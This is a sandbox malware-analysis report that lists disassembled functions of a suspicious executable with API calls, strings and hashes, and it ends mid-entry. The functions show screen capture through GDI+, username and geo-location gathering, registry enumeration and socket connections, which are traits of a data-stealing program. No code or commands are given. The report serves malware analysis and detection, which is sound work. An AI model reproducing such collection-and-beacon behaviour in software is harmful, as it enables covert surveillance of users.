API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
Opcode ID: 3f0d2640eba4d0f7871c2ec703edcb503dbe0d7ea7d03094cd3af9045bbe76bf
Instruction ID: 2b3ce0a2b8ddea04924b83d30d954ab6727470d75188be299e72ac9459df00eb
Opcode Fuzzy Hash: 3f0d2640eba4d0f7871c2ec703edcb503dbe0d7ea7d03094cd3af9045bbe76bf
Instruction Fuzzy Hash: BD414B32A18B81CAE7208F74D8803ED37A5FB5878CF454239EA8D86E4ADF79D564C744

Function 00007FF621841B90 Relevance: 1.8, APIs: 1, Instructions: 283COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621841FD2

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 0965e8a5a3a013ac4dae1d6fb5663ae1b4aef1e111aa07216de8ac0277f4490d
Instruction ID: fa9d10ebc8a3cd816d9a27e9d80a28738177b5d7512647ab5ebf3014d17d7d62
Opcode Fuzzy Hash: 0965e8a5a3a013ac4dae1d6fb5663ae1b4aef1e111aa07216de8ac0277f4490d
Instruction Fuzzy Hash: 0DD17362F08B8189FB10CB74D8803FC37B5EB5578CF455235EA4CA6A9ADF38A191C385

Function 00007FF621896150 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 00007FF621896195

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 543acbdf146a9e7b635a600a3cba3d05f3b2ef6cd278b1f660c9ea2185c3ff0f
Instruction ID: 4eee3909c6579f349bc6409e69e2ac3e91ea7e2718d9f6295b1afec3192fc8c2
Opcode Fuzzy Hash: 543acbdf146a9e7b635a600a3cba3d05f3b2ef6cd278b1f660c9ea2185c3ff0f
Instruction Fuzzy Hash: F401613291C78186EB20CF25EC413AEB3A0FB98788F544131E68DC2649DFBCD194CB45

Function 00007FF62188EBF0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 194
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF62188E970: InitializeCriticalSectionEx.KERNEL32 ref: 00007FF62188E9C1
Part of subcall function 00007FF62188E970: GetLastError.KERNEL32 ref: 00007FF62188E9CB

EnterCriticalSection.KERNEL32 ref: 00007FF62188EC31
GdiplusStartup.GDIPLUS ref: 00007FF62188EC58
LeaveCriticalSection.KERNEL32 ref: 00007FF62188EC66
LeaveCriticalSection.KERNEL32 ref: 00007FF62188EC94
GdipGetImageEncodersSize.GDIPLUS ref: 00007FF62188ECA2
GdipGetImageEncoders.GDIPLUS ref: 00007FF62188ED36
GdipCreateBitmapFromScan0.GDIPLUS ref: 00007FF62188EE00
GdipSaveImageToStream.GDIPLUS ref: 00007FF62188EE1E
GdipDisposeImage.GDIPLUS ref: 00007FF62188EE83
GdipDisposeImage.GDIPLUS ref: 00007FF62188EE97

Strings

&, xrefs: 00007FF62188EDFA

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: Gdip$Image$CriticalSection$DisposeEncodersLeave$BitmapCreateEnterErrorFromGdiplusInitializeLastSaveScan0SizeStartupStream
String ID: &
API String ID: 1703174404-3042966939
Opcode ID: dd964381881d80bb3d13f7f21f812b9ad7ab8c9b9795b3d442a88d8ae0dd4017
Instruction ID: 1b19091507ef22ffb8ff98e29854ff284e1bcfdc30ec785c81a575082b7ef98f
Opcode Fuzzy Hash: dd964381881d80bb3d13f7f21f812b9ad7ab8c9b9795b3d442a88d8ae0dd4017
Instruction Fuzzy Hash: 9F918F32A0CB468AEF20CF24EC806A837A0FB55798B654635EA0DC7B94DF3CE655C341

Function 00007FF62188FCA0 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 226
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6218958D0: GetUserGeoID.KERNEL32 ref: 00007FF6218958F7
Part of subcall function 00007FF6218958D0: GetGeoInfoA.KERNEL32 ref: 00007FF621895911
Part of subcall function 00007FF6218958D0: GetGeoInfoA.KERNEL32 ref: 00007FF621895961

Part of subcall function 00007FF621851900: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218519D4

WSAStartup.WS2_32 ref: 00007FF62188FDBE
socket.WS2_32 ref: 00007FF62188FDDB
htons.WS2_32 ref: 00007FF62188FE00
inet_pton.WS2_32 ref: 00007FF62188FE42
connect.WS2_32 ref: 00007FF62188FE5C
closesocket.WS2_32 ref: 00007FF62188FE7B
WSACleanup.WS2_32 ref: 00007FF62188FE81
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621890025
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189002B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621890031

Strings

geo, xrefs: 00007FF62188FD6B
system, xrefs: 00007FF62188FD2A

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$Info$CleanupStartupUserclosesocketconnecthtonsinet_ptonsocket
String ID: geo$system
API String ID: 2440148987-2364779556
Opcode ID: e0d81316ac5a9ec47e708f22d6d2b35dbff0130eb67f86f081418e6979ce0a08
Instruction ID: 79a64ab284cc60d0e343f6d7ea02ed530defe2b222d90cf609d9184e84614422
Opcode Fuzzy Hash: e0d81316ac5a9ec47e708f22d6d2b35dbff0130eb67f86f081418e6979ce0a08
Instruction Fuzzy Hash: B8B1A062F1CA4285FF008F64D8802FC33A2AB55798F415236DA2DD7AEADE3CD545C341

Function 00007FF621894A30 Relevance: 19.9, APIs: 13, Instructions: 417
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recv.WS2_32 ref: 00007FF621894C0C
recv.WS2_32 ref: 00007FF6218950EC
closesocket.WS2_32 ref: 00007FF6218950FE
WSACleanup.WS2_32 ref: 00007FF621895104
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218951FC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621895202
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621895208
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189520E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621895214
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189521A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621895226
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189522C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621895232

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$recv$Cleanupclosesocket
String ID:
API String ID: 3402187201-0
Opcode ID: 1afca6c29502c1d2c9cab2f9eab00d78ebf3c73ff731dfc9cf75e71ce8324803
Instruction ID: c192667c8d35d7343cc31e58e08e514a5f9561442acbad921868b62b0f71a87b
Opcode Fuzzy Hash: 1afca6c29502c1d2c9cab2f9eab00d78ebf3c73ff731dfc9cf75e71ce8324803
Instruction Fuzzy Hash: 4A127472A1CAC181EF209B14E8943EE6761FB89794F504231EAADC6BDADF7CD480C741

Function 00007FF621897A84 Relevance: 16.9, APIs: 11, Instructions: 356COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621897FE0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621897FE6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621897FEC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621897FF2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621897FF8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621897FFE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621898004
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189800A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621898010
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF621898016
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189801C

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: ec3dc1c7d2e625db99cb5f1240dba68e46eec31019b6fbe8e2b5f81989807d83
Instruction ID: a0f78c5f4cbe40a31aea5e90eb5286159234fd45b93187af70df1cde2f3c2c47
Opcode Fuzzy Hash: ec3dc1c7d2e625db99cb5f1240dba68e46eec31019b6fbe8e2b5f81989807d83
Instruction Fuzzy Hash: 85E1E463E18BC549EF108B34C8943FD6711EB9A7A8F109721EA6D96BDADF7C9180C241

Function 00007FF621886100 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 120COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218862CC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218862D2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218862D8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218862DE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218862E4

Strings

type must be number, but is , xrefs: 00007FF62188749B, 00007FF621887542
port, xrefs: 00007FF62188705F
ZPTcrQssPSx9WOSFMOMK+XoqcG1eYI9iRKFdlGnQ0T0=, xrefs: 00007FF621886449
pfHPZt1s0Dk=, xrefs: 00007FF6218864D1

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: ZPTcrQssPSx9WOSFMOMK+XoqcG1eYI9iRKFdlGnQ0T0=$pfHPZt1s0Dk=$port$type must be number, but is
API String ID: 3668304517-3430222472
Opcode ID: e3aa91c59c46f9ea8fbd35f9a1caa7236908dd6246656eb89052d6b177ca2f74
Instruction ID: 4e5dde184c4e2698f924ccb6eb712ce1ee140bc299786f4f338cc862da8b8b55
Opcode Fuzzy Hash: e3aa91c59c46f9ea8fbd35f9a1caa7236908dd6246656eb89052d6b177ca2f74
Instruction Fuzzy Hash: 814191A2A0DAC986EF04DF24D8D83BD6352EB41FC8F654431DA4DCA69BDF6DC4848391

Function 00007FF6218B092C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6218B0D59

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8d4d1184268d38eb40f1b2f8de77a3be335aedca5c603a4bb4196d88dea7cd4c
Instruction ID: 8c10104de1e9c9a8ea21930930fd97ff890958f6d693d366f9d8e0fb7f7308f7
Opcode Fuzzy Hash: 8d4d1184268d38eb40f1b2f8de77a3be335aedca5c603a4bb4196d88dea7cd4c
Instruction Fuzzy Hash: 2BC1E322A0C78692EF608F1498902BE77A0FB81B94F594231EA5DC77D2DF7CE6458303

Function 00007FF621897151 Relevance: 9.2, APIs: 6, Instructions: 163registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF621897169
RegEnumKeyExA.KERNEL32 ref: 00007FF6218971AE
RegCloseKey.ADVAPI32 ref: 00007FF6218973A4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218973D7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218973E3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6218973E9

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseEnumOpen
String ID:
API String ID: 2177193445-0
Opcode ID: 06f89f629545a0279750b3b9cef717d3e301042e5306f667135e3fd169232789
Instruction ID: d4c03141018aa39ae8cc603c9dc27806ba8c092ea1852cc323aed4c14cdec4f8
Opcode Fuzzy Hash: 06f89f629545a0279750b3b9cef717d3e301042e5306f667135e3fd169232789
Instruction Fuzzy Hash: 8E719272A1CB8585EF108B65E89036D6760FB853A8F504635EEAD93AD9DF7CE080D701

Function 00007FF62188EA50 Relevance: 9.0, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

DeleteObject.GDI32 ref: 00007FF62188EA93
EnterCriticalSection.KERNEL32 ref: 00007FF62188EAA5
EnterCriticalSection.KERNEL32 ref: 00007FF62188EAB5
GdiplusShutdown.GDIPLUS ref: 00007FF62188EAC3
LeaveCriticalSection.KERNEL32 ref: 00007FF62188EAD0
LeaveCriticalSection.KERNEL32 ref: 00007FF62188EADA

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
String ID:
API String ID: 4268643673-0
Opcode ID: f5a1ecfcc53808b035d0d15b7c47fae7049546fa7d089acffeffd9e0bb2d86bb
Instruction ID: 3da1bc4b9f9ebae575eb64ae99a412f1b4e24a11d4ec2d8791500a5a40660008
Opcode Fuzzy Hash: f5a1ecfcc53808b035d0d15b7c47fae7049546fa7d089acffeffd9e0bb2d86bb
Instruction Fuzzy Hash: CD113A36909B41C1EF10DF25EC8002973B4FB58FA8B684235EA6D866A4CF3CD997C341

Function 00007FF62187F7A0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62187FB09
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62187FB0F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62187FB15
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62187FB1B

Strings

exists, xrefs: 00007FF62187FAE7, 00007FF62187FAFC

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: exists
API String ID: 3668304517-2996790960
Opcode ID: 66ce603e863e1a92562b7b185054f2641b605b86b2e989222002d1ff8a565374
Instruction ID: 2d506a3032241bf6124fdf5bea1ba57c2fb5d6a155913e1985804698f7bafed2
Opcode Fuzzy Hash: 66ce603e863e1a92562b7b185054f2641b605b86b2e989222002d1ff8a565374
Instruction Fuzzy Hash: 6FA18472B18B8696EF10DF29DC802AD63A1FB44798F105636EA6DC7A99DF3CD542C301

Function 00007FF62187CAB0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62187CE19
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62187CE1F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62187CE25
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62187CE2B

Strings

exists, xrefs: 00007FF62187CDF7, 00007FF62187CE0C

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: exists
API String ID: 3668304517-2996790960
Opcode ID: f8edd69b6a5fbc592285aac7579d553092ca814a89e14fda6b6d69126b9801fc
Instruction ID: 47826694f25cf715a7ef5729e9b5cc95286fd347c8aabefd94a94f1578625838
Opcode Fuzzy Hash: f8edd69b6a5fbc592285aac7579d553092ca814a89e14fda6b6d69126b9801fc
Instruction Fuzzy Hash: D7A18372B18B8686EF109F28DC802AD6361FB84798F505636EB5DC7AA9DF3CD581C341

Function 00007FF6218970E0 Relevance: 7.6, APIs: 5, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF621897169
RegEnumKeyExA.KERNEL32 ref: 00007FF6218971AE

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: EnumOpen
String ID:
API String ID: 3231578192-0
Opcode ID: 28a2a366bbb867c1b776bce6e6fd1041bd2d4e60432bd46f00d47b751a96ee75
Instruction ID: 0ec74a9c0272b2f4bce829ed3b4a93ff4b91a2a435dd213d8d80554c58db4e14
Opcode Fuzzy Hash: 28a2a366bbb867c1b776bce6e6fd1041bd2d4e60432bd46f00d47b751a96ee75
Instruction Fuzzy Hash: 2631A032A08B8186EB208F61EC906AE77A4FB44798F604635EE9D97B54DF3CD191C700

Function 00007FF621890040 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 333COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF62189064D

Strings

ios_base::badbit set, xrefs: 00007FF621890685, 00007FF6218906BC, 00007FF6218906FA
exists, xrefs: 00007FF621890663

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157766155.00007FF621942000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157789272.00007FF621945000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157812031.00007FF621948000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff621810000_t0ppkxxj.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: exists$ios_base::badbit set
API String ID: 3668304517-2074760687
Opcode ID: 56eb2c46a03165e78bc60e584e569f25adc9a476a3138721444a4248b0dec4c8
Instruction ID: e8342fbeb223c5c9361605c22d433b8dadcf7453f82b031d1945ea5b9952c5e1
Opcode Fuzzy Hash: 56eb2c46a03165e78bc60e584e569f25adc9a476a3138721444a4248b0dec4c8
Instruction Fuzzy Hash: DFF13D72A1DBC695DF60DB14E8943EAA364FBC5744F808232DA8DC2A9ADF3CD505CB01

Function 00007FF621890730 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 325COMMON

Download Yara Rule

Strings

ios_base::badbit set, xrefs: 00007FF621890D5D, 00007FF621890D94, 00007FF621890DD2
exists, xrefs: 00007FF621890D3B

Memory Dump Source

Source File: 0000001A.00000002.2157629229.00007FF621811000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF621810000, based on PE: true

Associated: 0000001A.00000002.2157604129.00007FF621810000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157700675.00007FF6218E5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001A.00000002.2157743668.00007FF621940000.00000004.00000001.01000000.00000007.sdmpDownload File
